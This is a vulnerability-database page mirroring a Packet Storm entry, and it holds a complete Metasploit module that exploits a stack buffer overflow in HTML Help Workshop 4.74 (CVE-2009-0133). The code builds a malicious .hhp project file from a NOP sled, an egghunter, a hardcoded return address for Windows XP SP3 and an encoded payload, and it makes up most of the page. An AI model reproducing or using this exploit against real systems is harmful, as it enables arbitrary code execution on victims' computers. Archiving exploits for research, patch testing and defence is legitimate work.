Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormEncrypt3d.M!ndPACKETSTORM:84537
HistoryDec 31, 2009 - 12:00 a.m.

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit

2009-12-3100:00:00
Encrypt3d.M!nd
packetstormsecurity.com
29

0.052 Low

EPSS

Percentile

93.0%

JSON
`##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Egghunter  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',  
'Description' => %q{  
This module exploits a stack overflow in HTML Help Workshop 4.74  
By creating a specially crafted hhp file, an an attacker may be able  
to execute arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'Encrypt3d.M!nd', 'loneferret', 'jduck' ],  
'Version' => '$Revision: 7759 $',  
'References' =>  
[  
[ 'CVE', '2009-0133' ],  
[ 'BID', '33189' ],  
[ 'OSVDB', '22941' ],  
[ 'URL', 'http://www.exploit-db.com/exploits/10323' ],  
[ 'URL', 'http://www.exploit-db.com/exploits/10335' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},   
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",  
'StackAdjustment' => -4800,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
[ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0  
],  
'Privileged' => false,  
'DisclosureDate' => 'Jan 17 2009',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']),  
], self.class)  
  
end  
  
def exploit  
  
# use the egghunter!  
eh_stub, eh_egg = generate_egghunter  
  
off = target['Offset']  
idxf = ""  
idxf << make_nops(off - eh_stub.length)  
idxf << eh_stub  
idxf << [target.ret].pack('V')  
  
sploit = "[OPTIONS]\r\n"  
sploit << "Index file="  
sploit << idxf  
sploit << "\r\n"  
sploit << "\r\n"  
sploit << "[FILES]\r\n"  
sploit << "\r\n"  
sploit << eh_egg * 2  
sploit << payload.encoded  
  
hhp = sploit  
  
print_status("Creating '#{datastore['FILENAME']}' file ...")  
  
file_create(hhp)  
end  
  
end  
`

Related

openvas 2
nvd 1
cve 1
prion 1
cvelist 1
openvas
openvas
Microsoft HTML Help Workshop buffer overflow vulnerability
2009-01-19 00:00:00
Microsoft HTML Help Workshop buffer overflow vulnerability
2009-01-19 00:00:00
nvd
nvd
CVE-2009-0133
2009-01-15 17:30:00
cve
cve
CVE-2009-0133
2009-01-15 17:30:00
prion
prion
Buffer overflow
2009-01-15 17:30:00
cvelist
cvelist
CVE-2009-0133
2009-01-15 17:00:00

0.052 Low

EPSS

Percentile

93.0%

JSON
Related for PACKETSTORM:84537
openvas2nvd1cve1prion1cvelist1